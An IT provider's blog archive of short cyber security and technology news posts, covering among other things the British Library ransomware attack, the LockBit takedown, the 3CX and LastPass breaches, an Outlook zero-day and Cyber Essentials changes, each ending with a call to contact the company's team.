The British Library has published its lessons learned from the devastating cyber attack that struck in October 2023.

In an eighteen-page report which shows an impressive commitment to transparency, but makes for painful reading, the organisation details how it was compromised by the Rhysida ransomware group during a traumatic timeline of events. In a subsequent press release, the Library also states it hopes other institutions will learn from its findings in the wake of a ‘deeply damaging criminal attack.’

Unfortunately, the report makes clear that in response to tighter security standards, the organisation ceased to be Cyber Essentials Plus certified in 2022, pending replacement of some older systems. In section six, sixteen ‘lessons learned’ form the basis of its future plans and guidance to other organisations:

• Enhance network monitoring capabilities
• Retain on-call external security expertise
• Fully implement multi-factor authentication: Multi-factor authentication needs to be in place on all internet-facing endpoints, regardless of any technical difficulties in doing so.
• Enhance intrusion response processes
• Implement network segmentation
• Practice comprehensive business continuity plans
• Maintain a holistic overview of cyber-risk
• Manage systems lifecycles to eliminate legacy technology
• Prioritise remediation of issues arising from legacy technology
• Prioritise recovery alongside security
• Cyber-risk awareness and expertise at senior level
• Regularly train all staff in evolving risks
• Proactively manage staff and user wellbeing
• Review acceptable personal use of IT
• Collaborate with sector peers
• Implement Government standards, review and audit policies and processes regularly

The exact origin of the hack – which took Library systems offline for months – is unconfirmed, in part due to the scale of the destruction. However the Library’s independent security investigators believe the original breach was caused by either a spear-phishing, brute force or other credential compromise. This allowed hackers access to a remote session on a terminal server that was not yet subject to Multi-Factor Authentication for a user to login.

From there, around 600GB of data (or half a million documents) were exfiltrated, with searches for sensitively-named content such as ‘passport’ and ‘confidential’. Backup copies of twenty-two databases were also made, and removed from the network. Ransomware was also deployed, and the encrypted data used for attempted extortion.

At several points Rhysida are believed to have made their own actions difficult to track – deleting log files and destroying servers to prevent a swift recovery. In a classic ‘double-extortion’ the group also leaked employee and customer data for auction on the dark web in November, with a starting value of 20 Btc (then approximately £600,000). The British Library insists that in line with guidance given by the National Cyber Security Centre, no attempt was made to communicate with the attackers, nor any ransom paid.

The Rhysida ransomware group are also reported to, or have claimed responsibility for, hacks carried out in Chile, Portugal, Kuwait and the United States in the latter half of 2023. Cyber security professionals believe the hackers are Russian-speaking, although evidence is limited.

Lengthy and costly, the cleanup effort has clearly been difficult. The report details that the Library convened Gold and Silver level crisis-management committees, with both private sector and UK state cyber security assistance – although senior staff at the BL were at one point forced to communicate via an emergency WhatsApp call in the absence of official systems. The Library’s main catalogue, containing more than 36-million records, only returned online in ‘read-only’ format in January, and the report states ‘Many staff have been unable to perform significant parts of their roles’ (for more than 3 months.)

The Financial Times have speculated that the recovery costs may eventually total over £7m, which would represent around 40% of the institution’s known financial reserves, although the Library’s Chief Executive, Sir Roly Keating, told the BBC it was too early to calculate the true value.

For cyber security expertise and assistance, please contact our team today.

Lenovo have teased a futuristic prototype of a laptop with a transparent display.

The Thinkbook Transparent Display is a 17.3-inch laptop with a MicroLED display that appears (almost) clear when unlit. This creates the effect of near-transparency when using dark mode apps, while a white, full-brightness display remains opaque.

In practice the display has no bezel, and is currently only 720p, which would now feel a little basic compared to most modern laptops. Like most devices, the top of the base contains most of the components, with the keyboard being a projection.

Lenovo has form for unusual laptop concepts – being among the first to experiment with rollable displays, touch keyboards, dual-displays and other unusual variants – as well as a prototype transparent smartphone.

While technologically impressive, it’s not entirely clear what practical applications transparent displays have for this form factor. Lenovo argue this is another kind of augmented reality, with the user able to look behind the screen or visually check design work against the real world, although laptops usually rest on a surface while being used.

The first transparent laptops appeared more than a decade ago from Samsung, and LG plan the release of an OLED transparent TV for 2024, although Lenovo’s attempt is one of the most impressive to date.

For now the transparent ThinkBook is a mostly just an advert for Lenovo’s more conventional laptops, but Lenovo acknowledges one major strength: a screen which “seamlessly blends and harmonises with its surroundings.” Or, to put it another way, perhaps one day all our giant screens will be a little less… in the way.

Ransomware provider LockBit has been taken offline by a joint operation involving law enforcement agencies from eleven countries.

As of the 20th February, a banner on LockBit’s website declares that the site is now under the control of the UK’s National Crime Agency, part of a coordinated operation to take down the group’s ‘command and control’ infrastructure.

Authorities from the NCA, the FBI, Europol and others from around the world swooped on a number of individuals believed to be involved with Lockbit – making arrests in Poland, Ukraine, and in the United States. Two further named individuals are believed to be Russian nationals.

The combined operation (‘Operation Cronos’) also froze more than two hundred cryptocurrency accounts, took down 34 servers and closed 14,000 rogue accounts.

LockBit made headlines as one of the world’s most successful ‘Ransomware-as-a-service’ providers: offering a toolkit any would-be cyber criminal could use to launch their own cyber extortion operation, demanding more than $120m in ransoms for unlocking encrypted data.

The group behind LockBit, which first emerged on Russian forums in 2020, did not respond to Reuters following requests for comment, but published messages on an encrypted messaging app stating it has backup servers not yet ‘touched’ by law enforcement. Investigations by police in numerous countries also revealed copies of stolen data the group claimed to have deleted after negotiating ransom payments.

More than 1,700 organisations are believed to have been compromised by LockBit, many of which are now listed online – and include Royal Mail, the NHS, Boeing and ICBC, China’s largest bank, among many others.

Decryption tools have so far been released to victims of LockBit in 37 languages, as part of the ‘No More Ransom’ project, with UK authorities pledging to reach out to organisations affected by the ransomware.

For Cyber Security expertise and assistance, please contact our team today.

We’ve launched a new online Trust Centre aimed at demonstrating Lineal’s commitment to Cyber Security and data privacy.

We take our role as your trusted IT provider extremely seriously, and we hope the trust centre will show what we’re doing to maintain the highest of industry standards.

Available online to anyone at any time, our trust centre acts as a transparent dashboard showing our current compliance standards, risk profile and cyber security best practices. In addition to reviewing our key policies, we’ve detailed what we do to keep staff, data and systems safe – across numerous areas including endpoint protection, network security, backup, infrastructure, app and information control.

Our intention is that the trust centre gives our customers confidence in our dedication to good cyber hygiene, and acts as a useful reference resource when our clients are dealing with 3rd-party supply-chain assurances, industry frameworks and insurance providers.

Furthermore, we hope that a detailed overview of the cyber security strategy employed by Lineal acts as a model for others, and a useful template for the kind of organisational transition our own team can help your organisation pursue successfully.

Those measures are backed by important standards: Lineal is an ISO 9001 & 27001 accredited organisation, Cyber Essentials and Cyber Essentials Plus Certified – with reviews of our status undertaken by Cybersmart, Microsoft, Alcumus and Huntress.

For Cyber Security expertise and support, please contact our team today.

Major email providers including Google, Yahoo and AOL are set to tighten rules on incoming email – making accounts more secure against SPAM and demanding more of bulk senders who want to see their emails delivered.

Google and Yahoo alone represent more than two billion email accounts, many of them belonging to individual consumers for personal use. Estimates suggest around 70% of these have no protection against domain spoofing.

Until recently, even many basic security protocols such as SPF (checking whether email header and ‘sent from’ address match) were not enforced on major email platforms such as gmail – allowing fraudulent emails to unsuspecting users. This made phishing emails easier to circulate, harder to detect, and has been recognised as one of the biggest enablers for cyber security attacks.

DKIM – a protocol that signs both the real domain and email with a cryptographic signature that email clients can cross-reference for authenticity – is also often absent, with email providers increasingly looking to demand better standards from email senders.

From February 2024, bulk email senders must adhere to the following requirements outlined by Google and Yahoo:

New Sender Rules

SPF & DKIM Enforced – Business and organisations that need their emails to be delivered safely will have to add SPF & DKIM settings to their domains and mail servers that verify whether emails purporting to be from them are genuine, and have not been tampered with. Without checks in place, Gmail and Yahoo may reject those emails altogether.

Easy Unsubscription – bulk emails must offer ‘one-click’ unsubscribe options for recipients, making it easy for email recipients to opt-out of repeated unwanted messages, and keep clutter under control.

DMARC, the most challenging of the requirements, will be enforced for bulk email senders sending more than 5,000 emails per day, aimed at preventing rapid phishing scams and other mass attempts at fraudulent communications.

For those communicating with the public, the changes are likely to prove crucial, and IT managers need to prepare carefully to ensure their emails continue to be trusted.

For Cyber Security assistance and expertise, please contact our team today.

Each year new cyber threats appear to circulate online, and 2023 has certainly been no exception. For cyber criminals, it’s business as usual… right?

Not quite. Over time certain new patterns emerge that are important for cyber security researchers to identify, and these can help protect businesses and organisations in the future. So what can we learn from this year’s crop of nasty ransomware strains?

Akira

First spotted around April 2023, Akira ransomware appears to be one of the better-organised criminal efforts to extract payments from victims.

Suitable for multiple operating systems and sporting a green-and-black ransom note aesthetic Sophos describes as ‘Retro’, Akira is a professional effort that should give pause for thought.

Disabling many security settings to give itself more lateral movement on systems, the infection also tries to destroy backups to hinder the user, and has a ransom note written in (relatively) good quality English with a host of supporting infrastructure to help the hacker leverage a bigger payout.

The threat actor(s) behind Akira were known to exploit an existing VPN vulnerability to spread the ransomware, but had used stolen credentials purchased online from third-party data breaches to get started – in what has become a common pattern of low level breaches by third-parties supplying the more serious cyber crime via online black markets.

MedusaLocker

Originating back in 2019, this nasty ransomware has been through a string of variants with the most recent strain popping up in September 2023 to hit a major European health organisation.

MedusaLocker is an example of ‘Ransomware-as-a-Service’ – anybody can purchase and launch their own version, with a typical ransom being around $12,000. Like legal software companies, the developers behind Medusa even offer their customers a Support Helpdesk!

More recent variants have moved over to ‘double-extortion’ style attacks, where the hacker not only compromises the data, but threatens to leak a copy online, which is more likely to compel healthcare and public-sector organisations holding very private information on behalf of the public to pay the ransom demand.

Black Hunt

Targeting Windows environments, this ransomware looks relatively traditional, but may show the shape of things to come.

It can be spread both by email and via drive-by downloads on malicious websites that purport to give away free software or content, and for a special trick, immediately tries to terminate other processes on the user’s machine to speed up how quickly it can corrupt data – getting ahead of efforts to slow it down.

Curiously the ransomware searches for a specific text file called ‘Vaccine.txt’, which is likely a safety mechanism used by the original developers to protect their own systems against the dangerous infection.

The Group behind Black Hunt also use a tactic becoming increasingly popular among cyber criminals – publicly naming their victims in a perverse online ‘Hall of Fame’ – as a warning to others.

Our Verdict:

Keeping your data, staff and systems safe from ever-evolving ransomware infections means instilling good cyber-hygiene among your organisation, backed by a cyber security strategy that covers a range of areas including; endpoint protection, identify security, perimeter defence and user awareness training among others. Learn more here. 

For Cyber Security Expertise and Support, please contact our team today.

The NHS have updated their ‘secure email standard’ which other organisations are expected to follow.

First published in 2016, the minimum standards for email security are designed to protect NHS staff and systems against supply-chain attacks caused by weaknesses in the cyber security of third-parties.

The standard anticipates that one of the biggest risks to the NHS originates with the rest of us: outside organisations, who need to be trusted not to put the health service in danger via email compromise.

There are two ways to meet the NHS secure email standard:

1. Implement an existing compliant service such as NHSmail, Microsoft 365 or Google Workspace [and follow configuration guidelines for that service.]

2. Demonstrate your own [email] service is compliant with the secure email standard by following the NHS secure email accreditation process.

For those using the biggest platforms – NHSmail, Microsoft 365 or Google Workspace, the to-do list of requirements are simpler and include such steps as ensuring there is a process for notifying the NHS if you have been breached, policies and procedures for using mobile devices, risk assessment, documented policies and universal use within the organisation.

There are also a set of specific configuration settings which the NHS has documented for Microsoft 365 and Google Workspace, which you can learn more about here.

For organisations operating their own mail servers or other email systems, the requirements are more extensive, and require the organisation to manually achieve DCB1596 certification with documented evidence that their setup meets the NHS Secure Email Standard. This applies to organisations hosting their own Exchange, hybrid configurations, and other lesser-known business email platforms.

For cyber security assistance and support, please contact our team today.

Microsoft Copilot will release to users worldwide from 26th September 2023.

The flagship natural language AI tool that previewed back in March of this year brings ChatGPT functions to a whole range of Microsoft productions including your favourite Microsoft 365 apps, Azure, Bing and into Windows itself.

At a colourful launch event in New York, Microsoft CEO Satya Nadella debuted the official release of Copilot and demonstrated ways AI can revolutionise everyday tasks – whether that be writing emails, interpreting or generating images, transcribing handwriting into maths, or intelligently answering questions.

Copilot assistance aims to make Microsoft 365 apps including Teams, Word, Excel and more increasingly powerful – with users able to simply request complex data handling tasks rather than manipulating the data manually themselves. For more creative work, Copilot can also generate visual results within longstanding Microsoft apps like Paint.

This presents some fascinating opportunities for companies using the Microsoft 365 suite – common tasks such as ‘Re-write this email more professionally’, ‘Summarise this meeting’ and ‘Make me a set of PowerPoint slides based on this document’ would all be achievable within a few seconds.

Features from the Bing public preview have also made it into the release version – with users able to choose ‘More Creative’ ‘More Balanced’ and ‘More Precise’ language options to give the AI’s output a different tone, and draw on the wider web-based dataset that is previously unknown to the user.

For example, in another impressive example of Copilot using web and user data intelligently, an American user uploads a photo of a UK plug adaptor and asks ‘Will this work in London?’ Copilot is not only able to check based on an understanding of the image, but understands what the user means by ‘work’ and is able to confirm that the plug is the correct choice.

Some interesting guard rails have also been rolled in – Microsoft have previously stated that a firebreak exists between user data and the web dataset used to train the AI, but Copilot can use both to respond to prompts. Images created using the next version of DALL.E will also be crytographically signed as ‘Created by AI’, effectively signing the content as AI-generated.

Copilot will soon begin appearing to most users on the Windows toolbar – coinciding with the new upgrade of Windows 11 that is due on 26th September. Within Microsoft 365, Copilot Chat functions will begin appearing in app updates for Enterprise licence customers from 1st November 2023.

For Microsoft expertise and support, please contact our team today.

Microsoft have announced the end of WordPad – declaring that the word-processing app will be removed from future versions of Windows.

The difficult middle-child of Microsoft’s three main word-processing apps was originally released for Windows 95, and always sat a little uncomfortably between Microsoft Word (which has remained a heavyweight of the word processing scene) and Notepad (a stripped back, plain-text editor.)

Able to edit rich text for free, but with many features missing, WordPad was beloved by students, techies and other irregular writers who either didn’t have, or couldn’t afford, a licence for Microsoft Word.

The app was offered for free with each new release of Windows as a kind of ‘teaser’ for Word itself – but didn’t support many important features such as footnotes, subscript, tables, numbered lists, indentation and other typesetting options needed for more formal work. For more than decade, it remained many people’s only way to open a Word document, and gave digital access on millions of lower-specification machines across the developing world.

But WordPad itself has not been updated since the ill-fated Windows 8, way back in 2012, and still looks somewhat reminiscent of Office 2007 a decade later. There are also more alternatives in 2023 – with Microsoft Word more affordable than ever as part of Microsoft 365 (both on the web and on the desktop), Google Docs chasing the education market, and free alternatives like Libre Office and Open Office winning over casual users.

Farewell WordPad!

3CX, one of the world’s best known telephony applications, has been rocked by a devastating supply-chain attack that is infecting end-users.

The breach, designated ‘SmoothOperator’ is believed to affect both the 3CX Desktop app and PMA, 3CX’s recommended replacement. Once the trojanised payload is delivered to the 3CX end-user, it interacts with popular web browsers such as Chrome, Edge, Firefox and Brave – likely in an attempt to steal user data, including browser history, down the line.

In a video released earlier today – SentinelOne demonstrated the forensic detection of SmoothOperator which has risen dramatically in recent days. A sample of how the powerful endpoint security software blocks the threat can be seen in the video below.

Security analysts are rumoured to have discovered links to Labyrinth Collima, a North Korean Lazarus Group offshoot from Bureau 121 of the DPRK’s ‘Reconnaissance General Bureau.’ 3CX is believed to be in use by more than 12 million daily users around the world, among more than 600,000 organisations.

Managed detection and response specialists Huntress have published a wide-ranging report on the breach with a difficult verdict for organisations using 3CX:

“We anticipate that 3CX will not complete a root cause analysis of this incident for some time, and users should look for alternative telephony mechanisms for the foreseeable future.”

Remediation: organisations using 3CX are advised to…

1. Enforce mandatory password resets for all users.
2. Reset passwords for any web-based accounts which might have suffered credential harvesting via the user’s browser, and have multi-factor authentication (MFA) enabled for those accounts.3. Invalidate any persistence tokens used for Microsoft 365, Google Workspace and other accounts that might allow automatic login without MFA.
4. Enable high security risk conditional access if using Microsoft Azure.

For Cyber Security expertise and assistance, please contact our team today.

Microsoft have announced plans to throttle, and eventually block, emails sent from on-premises and hybrid Microsoft Exchange Servers that remain unpatched.

“Persistently vulnerable” servers will receive incrementally stricter controls, beginning with throttling (delayed delivery) up to and including a complete block beyond 90-days, preventing onward delivery to other Microsoft-based email accounts such as those in Microsoft 365/Exchange Online and Outlook.com.

The dramatic move puts yet another large question mark over organisations relying on on-premises Exchange server hardware. While Exchange 2003, 2007, and 2010 are now rare, Exchange 2016 still remains in surprisingly widespread use, and many copies of Exchange 2019 are not regularly patched against known vulnerabilities.

Extra controls will apply to servers that run on outdated or unsupported software or haven’t been patched against known security bugs – to help Exchange admins identify unpatched or unsupported on-premises Exchange servers, and allowing them a chance to upgrade or patch before they become security risks.

Recent times have seen a string of major vulnerabilities against Exchange server – including by the Chinese hacking group Hafnium.

Even in 2023, A simple Shodan search still shows thousands of Internet-exposed Exchange servers, with many still waiting to be secured against attacks targeting them with ProxyLogon and ProxyShell exploits, two of the most exploited vulnerabilities from 2021.

For cyber security advice and expertise, please contact our team today.

Backups are essential to ensure business continuity and protect against of data loss, system failures, or cyber attacks – and IT experts often reference the fabled ‘3-2-1’ rule when organising backups into an effective strategy.

The 3-2-1 backup rule states that businesses should have at least three copies of their data, stored on at least two different storage devices, with at least one copy being stored offsite:

1. Three Copies of Data
The first part of the 3-2-1 rule states that businesses should keep at least three copies of their data. This means that there should be two backup copies of the original data. Having multiple copies of data ensures that in case of data loss or corruption, and dramatically cuts the risk of complete data loss. As long as there’s at least one remaining backup copy, even giant corporations can always restore their data in a dire emergency.

2. Two Storage Mediums
The second part of the 3-2-1 rule states that the data should be stored on at least two different storage devices. This means that businesses should not rely on a single storage device, such as an external hard drive or a cloud server, for their backups. Storing backups on at least two different devices ensures that if one device fails, there is always a backup available from a separate source.

It’s worth noting that this principle also needs to extend to cloud-based environments: where organisations use Microsoft 365 or Google Workspace as their primary platform, secondary backups of that data needs to exist independent of that public cloud.

3. One Copy Offsite
The third and final part of the 3-2-1 rule states that businesses should keep at least one copy of their data offsite; ideally more! This means that the backup should not be stored in the same location as the original data or the other backup copies. This ensures that in case of a physical disaster, such as a fire, flood, or theft, the backup data is still safe and can be accessed from a different location.

While not perfect (cyber security experts argue modern backup solutions should probably specify immutability, for example) the 3-2-1 principle guards against each of the biggest threats to business data – destruction of the original data, failure of the device hardware holding that data, and a disaster at the site where that hardware exists – that most often causes financial losses, legal liability and repetitional damage.

By planning your backups with this rule in mind, you’ll know your business continuity is protected against common emergencies.

For IT Support & expertise, please contact our team today.

Microsoft have acknowledged a critical new zero-day vulnerability with Outlook, that does not require any user interaction with an email to be triggered.

Reported by the Ukrainian Computer Emergency Response Team (CERT) to Microsoft and graded 9.8/10 on the severity scale according the NIST, the exploit is believed to have already been used by a “Russia-based threat actor” in attacks against European targets across government, transport, energy and military sectors.

The exploit (CVE-2023-23397) abuses the way Microsoft Outlook attempts to follow links in emails to retrieve remote content, even before they’re opened or viewed in the preview pane – allowing a remote attacker’s server to request authentication via an old technology known as NTLM, and automatically receive poorly encrypted username and password details from Outlook. NTLM was officially retired by Microsoft after Exchange 2003, but the technology remains available in current versions.

This is dangerous because with a username, password and corresponding email address, hackers have effectively completed a credential theft without any interaction from the end user. Many users use their email account as a single-sign on for other applications, putting numerous other services at risk.

CVE-2023-23397 is not yet fully documented however Microsoft believe the vulnerability occurs “when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat-actor controlled server. No interaction is required.” Once a connection is made, the server sends the user a new technology LAN manager (NTLM) negotiation message which is relayed for authentication – none of which requires the user to even view the email itself.

The exploit affects only the Microsoft Windows version of the Outlook Desktop client. Outlook for Mac, the Outlook Web & Mobile Apps (as well as Outlook.com) are not affected – since these do not support NTLM authentication. Estimates vary but Outlook is said to be used by over 400 million users worldwide, in its various forms.

System administrators are advised to urgently patch with the latest Outlook updates from Microsoft within 24 hours.

Where this is not possible, system administrators are advised to add users to the Protected Users Security Group (blocking NTLM), or Block TCP 445/SMB outbound from network firewalls or via VPN settings, cutting off any NTLM authentication messages at the perimeter of your network. In both cases, Microsoft warn this may affect other services from working correctly.

For Cyber Security expertise and support, please contact Lineal’s Cyber Security Team today.

LastPass have confirmed that a hack on a staff member’s home PC led to a massive cyber security breach on the company.

The second stage of the attack used data stolen in LastPass’s August breach, cross-referenced with other stolen information, to launch a targeted sting on one of their DevOps engineers – installing a key logger on the staff member’s home PC which resulted in the loss of yet more data.

LastPass confirmed the attacker was able to steal the user’s master password, gaining access to corporate vault resources and shared folders. In the process, encrypted notes and decryption keys needed to access LastPass production backups based in Amazon Web Services (AWS) – cloud-based storage and critical database backups were also compromised.

Since the August 2022 breach, when LastPass source code was stolen, the company has admitted the breach also saw the theft of account usernames, hashed passwords, and some Multi-Factor Authentication (MFA) settings belonging to end users.

Unfortunately LastPass also acknowledged that saved URL for each password entry was unencrypted, giving potential attackers an obvious clue to the purpose of each set of credentials.

The breach highlights the way remote working culture has introduced significant new digital risks – such as the danger of home users accessing work data, resources and applications on devices that sit ‘outside’ of company cyber security protections.

LastPass is believed to be used by over 85,000 businesses and 30 million end users.

For Cyber Security Expertise & Support, please contact our team today.

Managed Cyber Security

We recently attended a special event about the danger of Russian cyber aggression against the UK: here’s the latest guidance from the UK National Cyber Security Centre.

Be prepared for changes to Russian strategy

A feared ‘firestorm’ of wholesale attacks on the digital infrastructure of the UK and Ukraine’s other Western allies hasn’t arrived, but the NCSC urges Russia remains extremely unpredictable.

Intelligence agencies are now concerned Russia may launch a new cyber attacks on the West this year, partly as compensation for Russian ground war failures.

Rates of cyber attacks on UK organisations remain ‘steady’, with some very serious incidents reported – and the NCSC has emphasised before how Russian cyber attacks on satellite networks and banking systems in Ukraine have spilled over into multiple countries.

We do know that behind the scenes a number of UK organisations have been carefully briefed to prepare for Russian cyber attacks over the past year – and a ‘handful’ of cyber incidents each year are serious enough to require COBRA meetings.

Yes, REALLY unpredictable

Russian strategic aims are often inconsistent. Boldness and risk-taking are known to be favoured in Russian high command – which itself encourages reckless cyber operations, experimental techniques and surprise attacks – but also corners-cut and operational errors.

Much like the Russian ground offensive, many of the most aggressive Russian cyber attacks – such as the widespread use of destructive Wiper malware – appear to have been ‘front-loaded’ during March/April, preparing for a quick victory which did not materialise even as Ukrainian systems have been hardened.

Far less technical attacks also appear to have crept into the mix – alongside a curious quality gap in the actual work of Russian operatives, as if threat actors are being supplemented by other personnel. Recent incidents have highlighted the names of known Russian intelligence officers visible within the code of malware, and fascinating research by Mandiant even suggests attempts by the GRU to recruit assistance from amateur hacktivist volunteers via covert pro-Russian Telegram channels.

However, the NCSC emphasises that ineptitude or failure is not a barrier to the further attacks by Russia – the individuals behind the attacks are shameless, and cyber attacks remain a convenient way to highlight weaknesses from policy makers in other countries.

Essentially ‘nothing is off-limits’ – an approach that is also exacerbated by the internal competition between Russian service branches, with the FSB, FDR, GRU and others often seeking to outdo each other.

Who is a target in the UK?

Past experience suggest Russian cyber operations often include a key psychological element – following infamous KGB tradition.

As a result, the Russian military likes to target ‘pressure points’ in particular: critical infrastructure, the energy sector, transport, media organisations, senior politicians and especially companies with visible public-facing operations – anything that might generate panic among the public, suggest democratic policy makers are weak, undermine the West’s resolve to support Ukraine, or provoke a widespread feeling of vulnerability.

Ukraine provides some clues as to Russian strategy, but the NCSC emphasises that espionage attacks can often involve gaining access for no specific purpose – and (for example: obtaining privileged administrator access to systems) are simply a contingency for the future.

Organisations that plan ahead suffer less pain

Official advice is clear: organisations that prepare even the most basic disaster-contingency plans recover more quickly and suffer much less financial pain in the event of a cyber attack.

Even very simple crisis management steps like agreeing ‘who is in charge’ in advance, confirming ‘where are the backups’, and keeping printed copies of essential preparations for an emergency, all help radically minimise the damage, disruption and time to recovery.

However, this too comes with an NCSC warning: five years of IT improvement won’t be squeezed into your crisis remediation – better to have a roadmap for improving your cybersecurity as part of your existing business plans.

EDR is a Must

Forensic engines included in modern Endpoint Detection & Response (EDR) software help provide rapid information about the scale of hacks during incident response – this provides essential time for first responders to mitigate further threats, limit damage, and give the NCSC information about the threat to others.

The NCSC argues that British resilience will rely not just on small organisations across the country remaining vigilant, but gathering a wider pool of information on the centre’s behalf – the grassroots feeds into the ‘bigger picture’ of national security, and defending the UK is a team effort.

Services like the Signpost Cyber Incident Service now allow smaller organisations to report cyber attacks centrally.

Ransomware is THE threat.

NCSC guidance, right from the top of the organisation’s CEO remains the same:

“Even with a war raging in Ukraine, the biggest global cyber threat we still face is ransomware” – Lindy Cameron, NCSC CEO, June 2022.

Useful Links:

• NCSC Early Warning System – Early Warning helps organisation investigate cyber attacks on their network by notifying them of malicious activity that has been detected in information feeds
• NCSC Exercise in a Box – A free online tool which helps organisation find out how resilience they are to cyber attacks & practice their response in a safe environment.
• Incident Management – cyber incident response plan NCSC guidance to create your own cyber incident response plan
• The UK National Cyber Strategy – setting out five key pillars in the UK’s Cyber Planning.

For cyber security and technical expertise, please contact our team today.

Each year GCHQ’s National Cyber Security Centre issue stricter new rules for business and organisations looking to secure UK Cyber Essentials (CE) and Cyber Essentials Plus (CE+) Certification.

Continuing themes from last year, there are now tighter rules on account access, thin clients, device firmware, remote desktops, antivirus/EDR solutions and more. Despite the success of the Cyber Essentials scheme, the past year has seen some notable cyber attacks on British organisations, and renewed calls for cyber security vigilance.

We’ve compiled a summary to help organisations prepare for what revisions are coming down the line in April.

Multi-Factor or Else.

Even sooner than many expected, Cyber Essentials will now require not only Administrators to have Multi-Factor Authentication enabled – but all end-user accounts as well, across all platforms. Previously exemptions were granted for services without this option available, now that gap closes.

Instead, where a service doesn’t support MFA this will now be declared a non-conformity, bringing digital services fully into line with the rules enforced on UK online banking, and even applying to school children – right down to reception-age.

That’s likely to pose a challenge for companies (and particularly schools) using any software or web services which don’t yet offer MFA – so many organisations may need to look at augmenting their IT setups with 3rd-party MFA solutions like Cisco Duo.

Don’t forget the Firmware!

Software version controls now extend to hardware device firmware – with the definition clarified to specifying “firewall and router firmware” in particular – which was always essential, given the perimeter nature of these devices. In a rare step back, firmware on servers, PCs and other devices has been removed from the scope.

Device Clarifications

The NCSC has admitted third-party devices have been a point of confusion – and has published a revised table clarifying which devices are within the scope of Cyber Essentials. Updates will apply only to devices which are not domain-joined, or when unlocked have limited access to data (smartphones, handheld scanners etc.) If the a vendor does not allow configuration to see CE standards, the application may use the vendor defaults without incurring a non-conformity.

Given that the definition partly rests on who owns the device in question, we predict more changes in future years.

Not Just Any Anti-Malware

Antivirus solutions no-longer need to be ‘Signature-based’ – since the best EDR solutions don’t rely on signature-based detection of threats anyway. CE+ audits will include extra tests to verify that anti-malware software is effective (beyond simple EICAR tests) and application allow-listing is being encouraged.

Scoring Changes

Minor/Major non-conformities have been merged with a single Non-Conformity mark. Any applicant receiving three non-conformities will receive an instant failure. Corrective actions must now be completed within two days, despite some exceptions are available for larger organisations.

However, unsupported operating systems become an unfortunate immediate triple-word score: the presence of any unsupported operating system within the scope is an automatic fail.

For Cyber Security and Cyber Essentials expertise, please contact our team today.

By 2025 the UK’s analogue phone network is being switched-off, but that’s not the only major communications technology that is due to be retired imminently.

3G mobile networks are also due to be switched off, with Vodafone leading the charge to retire the older technology. 3G, launched in the UK in 2003, has been replaced in recent years by faster, more reliable 4G and 5G coverage.

According to guidance from Ofcom, the schedules of the UK’s major mobile providers are as follows:

The disappearance of 3G will mostly only affect very rural areas but also those customers with older mobile devices that don’t support newer 4G or 5G. In addition, Ofcom advises businesses to check any other kinds of 3G-enabled devices – such as care alarms, payment terminals and security devices, to ensure these don’t become non-functional. Mobile providers are obligated to announce the change to their customers nearer the time.

Traditional 2G voice and text services are expected to remain in place on Vodafone, EE and O2 until at least the 2030s.

For business mobile expertise and support, please contact our team today.

Extended Support for Windows 7 and Windows 8.1 officially ends as of January 2023.

The older operating systems will no longer receive any security patches or technical updates from Microsoft, which poses a compliance risk to businesses and organisations.

Mainstream support for Windows 7 originally ended in early 2020, although some Enterprise users could choose to purchase an ‘Extended Security Update’ (ESU) program for an additional three years.

Ever since then, Microsoft has regularly urged users to upgrade to Windows 10, and later Windows 11 on PCs with TPM security built into their chipset.

Windows 7 was originally released in 2009 and became an overnight success, selling over 100 million copies within six months. As of September 2022, a staggering 11% of traditional PCs are somehow still estimated to be running Windows 7 globally.

Windows 8 suffered a more checkered history: originally developed with a touchscreen-friendly tile display designed to be similar across PCs, tablets and the ill-fated Windows Mobile – many users found the new user interface confusing, continuing the mysterious curse of alternate-versions of Windows being a flop.

Microsoft Edge 109 will also be the last version of the web browser that will be considered supported for Windows 7 and 8, with a similar change expected from Google within Google Chrome.

Now the World officially waves goodbye to Windows 7/8.1, and any users still stuck on the old versions are faced with the choice of either purchasing a licensing upgrade for their old PC if their hardware permits it, or replacing their device entirely with a newer Windows 10/11-based model.

For Operating System expertise and support, please contact our team today.

UK & Dutch police have helped lead an international operation with Europol to take down one of the World’s biggest DDoS-for-hire services, webstresser.org.

The UK’s National Crime Agency and their Dutch Police counterparts announced the success of ‘Operation Power Off’ – which saw the seizure of infrastructure believed to be linked with criminal activity based in the UK, Netherlands and Germany, and the arrest of individuals as far afield as the UK, Spain, Canada, Croatia, Italy, Australia and Hong Kong by at least a dozen different law enforcement agencies.

On the other side of the Atlantic, the Department of Justice announced an additional six arrests by the FBI, with a further 48 domains seized as part of a criminal investigation into DDoS-for-hire operations.

According to Europol, Webstresser is estimated to have let over 136,000 customers launch more than four million Distributed Denial of Service (DDoS) attacks on targets for as little as £11, overwhelming websites and online services with traffic and knocking them offline. Although DDoS for hire services often pose as genuine ‘stress-test’ tools, users with very little technical knowledge were able to order attacks on unrelated targets – choosing between ‘Bronze’ ‘Silver’ and ‘Platinum’ packages.

The service was thought to be responsible for cyber attacks on at least seven major UK banks in November 2021, as well as numerous other businesses and government departments around the world. The BBC reports UK police have raided an address in Bradford, in connection with last year’s attacks on UK banks in particular.

Jaap van Oss, the Dutch Chair of the Joint Cybercrime Action Taskforce (J-CAT) praised the joint cooperation by law enforcement agencies to finally take Stresser offline.

Apple has released two urgent security warnings for iOS, iPadOS and macOS in response to two new zero-day vulnerabilities.

The company believes both weaknesses – found in WebKit, the engine which underpins Safari, Apple device kernels, and many other apps – are being actively exploited by hackers.

A vulnerable device that accesses “maliciously crafted web content” would allow hackers to execute code, and even to “execute arbitrary code with kernel privileges” – essentially full access to the device.

Affected Software Versions Include:

• iOS prior to 15.6.1
• iPadOS prior to 15.6.1
• macOS Monterey 12 Prior to 12.5.1

Users are advised to check their OS version and update immediately. To do this, please navigate to:

• On iPhone or iPad: Settings > General > Software Update
• On Mac: Apple Menu > About this Mac > Software Update

For Apple Support and Expertise, please contact our team today.

Microsoft have altered how macros activate in Microsoft Office files, in an effort to improve users’ cyber security.

Macros, which allow office files to run sequences of commands, can be used to automate simple tasks – but also maliciously by hackers as a mechanism of attack.

Macro-based hacks have been around since the late 1990s, but remain surprisingly effective. Users are commonly asked to open unexpected email attachment and authorise the macro to see its mystery contents, allowing the macro to introduce malware onto the system. In effect, users authorise the hack themselves.

